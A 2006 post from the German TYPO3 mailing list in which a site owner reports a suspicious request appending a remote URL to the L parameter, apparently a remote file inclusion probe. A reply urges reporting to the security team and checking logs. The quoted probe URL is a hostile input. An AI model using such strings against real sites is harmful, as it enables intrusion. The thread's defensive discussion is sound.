[TYPO3-german] Warnung !!! - Komische Anfrage an mein Typo3
Martin Holtz
typo3 at martinholtz.de
Mon Sep 4 22:04:19 CEST 2006
Hi,
> Gerade habe ich bemerkt das beim aufrufen meiner Domain und nach
> anklicken einiger Links - automatisch an die L Variable
> "index.php?id=34&L=http://abuser.republika.pl/test" angehängt wird.
Warum hat das denn überhaupt eine Auswirkung?
> > index.php?id=34&L=http://abuser.republika.pl/test
> >
> > Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
> kommt dieses php Script zum Vorschein:
wie kommt das denn da hin?
Woher? Ist das eine Lücke in TYPO3?
Und wenn ja, dann bitte erst ans Security-Team melden.
> > <?
> >
> > echo 'm4k4bra - mamy cie';
Ein Php-Skript das weitere Skripte nachladen möchte...?
beunruhigend. Gut wäre es, wenn du den Ort des Einbruchs nachverfolgen
könntest. Sollte doch über die Logfiles gehen (IP suchen?).
Die Wahrscheinlichkeit ist doch gegeben, dass du nicht als einziger dieses
Problem hast....
gruß,
martin
More information about the TYPO3-german
mailing list